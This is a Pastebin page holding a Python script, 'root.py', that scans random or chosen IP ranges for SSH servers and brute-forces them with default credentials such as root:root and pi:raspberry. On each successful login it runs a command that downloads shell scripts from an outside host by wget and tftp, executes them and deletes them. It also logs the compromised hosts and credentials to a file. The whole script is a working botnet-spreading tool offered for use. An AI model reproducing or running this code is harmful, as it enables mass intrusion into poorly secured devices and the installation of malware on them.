API tools faq
paste
Advertisement
Guest User

root.py

a guest
Jan 23rd, 2016
334
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.30 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/env python
  2. # python root.py 500 LUCKY x 0
  3. # python root.py 500 B 101.108 1
  4. # python root.py 500 A 125 1
  5.  
  6. from termcolor import colored
  7. import threading, paramiko, random, socket, time, sys
  8.  
  9. paramiko.util.log_to_file("/dev/null") # silents spam of paramiko
  10.  
  11. reservedips = [
  12. 'http://127.',
  13. 'http://0',
  14. 'http://10.',
  15. 'http://100.64',
  16. 'http://100.65',
  17. 'http://100.66',
  18. 'http://100.67',
  19. 'http://100.68',
  20. 'http://100.69',
  21. 'http://100.70',
  22. 'http://100.71',
  23. 'http://100.72',
  24. 'http://100.73',
  25. 'http://100.74',
  26. 'http://100.75',
  27. 'http://100.76',
  28. 'http://100.77',
  29. 'http://100.78',
  30. 'http://100.79',
  31. 'http://100.80',
  32. 'http://100.81',
  33. 'http://100.82',
  34. 'http://100.83',
  35. 'http://100.84',
  36. 'http://100.85',
  37. 'http://100.86',
  38. 'http://100.87',
  39. 'http://100.88',
  40. 'http://100.89',
  41. 'http://100.90',
  42. 'http://100.91',
  43. 'http://100.92',
  44. 'http://100.93',
  45. 'http://100.94',
  46. 'http://100.95',
  47. 'http://100.96',
  48. 'http://100.97',
  49. 'http://100.98',
  50. 'http://100.99',
  51. 'http://100.100',
  52. 'http://100.101',
  53. 'http://100.102',
  54. 'http://100.103',
  55. 'http://100.104',
  56. 'http://100.105',
  57. 'http://100.106',
  58. 'http://100.107',
  59. 'http://100.108',
  60. 'http://100.109',
  61. 'http://100.110',
  62. 'http://100.111',
  63. 'http://100.112',
  64. 'http://100.113',
  65. 'http://100.114',
  66. 'http://100.115',
  67. 'http://100.116',
  68. 'http://100.117',
  69. 'http://100.118',
  70. 'http://100.119',
  71. 'http://100.120',
  72. 'http://100.121',
  73. 'http://100.122',
  74. 'http://100.123',
  75. 'http://100.124',
  76. 'http://100.125',
  77. 'http://100.126',
  78. 'http://100.127',
  79. 'http://169.254',
  80. 'http://172.16.',
  81. 'http://172.17.',
  82. 'http://172.18.',
  83. 'http://172.19.',
  84. 'http://172.20.',
  85. 'http://172.21.',
  86. 'http://172.22.',
  87. 'http://172.23.',
  88. 'http://172.24.',
  89. 'http://172.25.',
  90. 'http://172.26.',
  91. 'http://172.27.',
  92. 'http://172.28.',
  93. 'http://172.29.',
  94. 'http://172.30.',
  95. 'http://172.32.',
  96. 'http://192.0.0.0',
  97. 'http://192.0.0.1',
  98. 'http://192.0.0.2',
  99. 'http://192.0.0.3',
  100. 'http://192.0.0.4',
  101. 'http://192.0.0.5',
  102. 'http://192.0.0.6',
  103. 'http://192.0.0.7',
  104. 'http://192.0.2.',
  105. 'http://192.88.99.',
  106. 'http://192.168.',
  107. 'http://198.18.',
  108. 'http://198.19.',
  109. 'http://198.51.100.',
  110. 'http://203.0.113.',
  111. 'http://224.',
  112. 'http://225'
  113. ]
  114.  
  115.  
  116. passwords = [ # perls/la
  117. "root:root",
  118. "root:admin",
  119. "admin:admin",
  120. "ubnt:ubnt"
  121. "root:1234",
  122. "admin:1234",
  123. "guest:guest",
  124. "user:user",
  125. "test:test",
  126. "pi:raspberry",
  127. "vagrant:vagrant"
  128. ]
  129.  
  130. if sys.argv[4] == '1':
  131. passwords = [ "root:root", "ubnt:ubnt", "admin:admin" ] #Slow but effective
  132. if sys.argv[4] == '2':
  133. passwords = [ "root:root" ] #Fast but yet less effective
  134. if sys.argv[4] == '3':
  135. passwords = [ "root:synopass" ]
  136. if sys.argv[4] == 'perl':
  137. passwords = [ "pi:raspberry", "vagrant:vagrant", "ubnt:ubnt" ] #perl scanner
  138. if sys.argv[4] == 'all':
  139. passwords = [ "pi:raspberry", "vagrant:vagrant", "root:root", "root:admin", "admin:admin", "ubnt:ubnt", "root:1234", "admin:1234", "guest:guest", "user:user", "test:test" ] # scans all passwords but very slow
  140.  
  141. ipclassinfo = sys.argv[2]
  142. if ipclassinfo == "A":
  143. ip1 = sys.argv[3]
  144. elif ipclassinfo == "B":
  145. ip1 = sys.argv[3].split(".")[0]
  146. ip2 = sys.argv[3].split(".")[1]
  147. elif ipclassinfo == "C":
  148. ips = sys.argv[3].split(".")
  149. num=0
  150. for ip in ips:
  151. num=num+1
  152. if num == 1:
  153. ip1 = ip
  154. elif num == 2:
  155. ip2 = ip
  156. elif num == 3:
  157. ip3 = ip
  158. class sshscanner(threading.Thread):
  159. global passwords
  160. global ipclassinfo
  161. if ipclassinfo == "A":
  162. global ip1
  163. elif ipclassinfo == "B":
  164. global ip1
  165. global ip2
  166. elif ipclassinfo == "C":
  167. global ip1
  168. global ip2
  169. global ip3
  170. def run(self):
  171. while 1:
  172. try:
  173. while 1:
  174. thisipisbad='no'
  175. if ipclassinfo == "A":
  176. self.host = 'http://'+ip1+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  177. elif ipclassinfo == "B":
  178. self.host = 'http://'+ip1+'.'+ip2+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  179. elif ipclassinfo == "C":
  180. self.host = 'http://'+ip1+'.'+ip2+'.'+ip3+'.'+str(random.randrange(0,256))
  181. elif ipclassinfo == "LUCKY":
  182. lucky = ["201.13","197.23","187.89","37.236","191.53","161.18","191.53","186.208","1.0","177.137","177.38","101.108","125.27","177.44","179.189","179.97"]
  183. self.host = 'http://'+random.choice(lucky)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  184. else:
  185. self.host = 'http://'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  186. for badip in reservedips:
  187. if badip in self.host:
  188. thisipisbad='yes'
  189. if thisipisbad=='no':
  190. break
  191. self.host=self.host.replace('http://', '')
  192. username='root'
  193. password=""
  194. port = 22
  195. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  196. s.settimeout(3)
  197. s.connect((self.host, port))
  198. s.close()
  199. ssh = paramiko.SSHClient()
  200. ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  201. dobreak=False
  202. for passwd in passwords:
  203. if ":n/a" in passwd:
  204. password=""
  205. else:
  206. password=passwd.split(":")[1]
  207. if "n/a:" in passwd:
  208. username=""
  209. else:
  210. username=passwd.split(":")[0]
  211. try:
  212. ssh.connect(self.host, port = port, username=username, password=password, timeout=3)
  213. dobreak=True
  214. break
  215. except:
  216. pass
  217. if True == dobreak:
  218. break
  219. badserver=True
  220. stdin, stdout, stderr = ssh.exec_command("/sbin/ifconfig")
  221. output = stdout.read()
  222. if "inet addr" in output:
  223. badserver=False
  224. websites = [ ]
  225. if badserver == False:
  226. print 'Executing on -> '+self.host+':'+username+':'+password+''
  227. ssh.exec_command("cd /tmp || cd /var/run;wget http://192.223.25.212/abbin.sh;sh abbin.sh;rm -rf abbin.sh;tftp -r abbint1.sh -g 192.223.25.212;sh abbint1.sh; tftp 192.223.25.212 -c get abbint2.sh; sh abbint2.sh; rm -rf abbint1.sh abbint2.sh abbin.sh")
  228. f = open('vuln.txt', 'a')
  229. f.write("%s:%s:%s\n" % (username, password, self.host))
  230. f.close()
  231. time.sleep(20)
  232. ssh.close()
  233. except:
  234. pass
  235.  
  236. for x in range(0,int(sys.argv[1])):
  237. try:
  238. t = sshscanner()
  239. t.start()
  240. except:
  241. pass
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!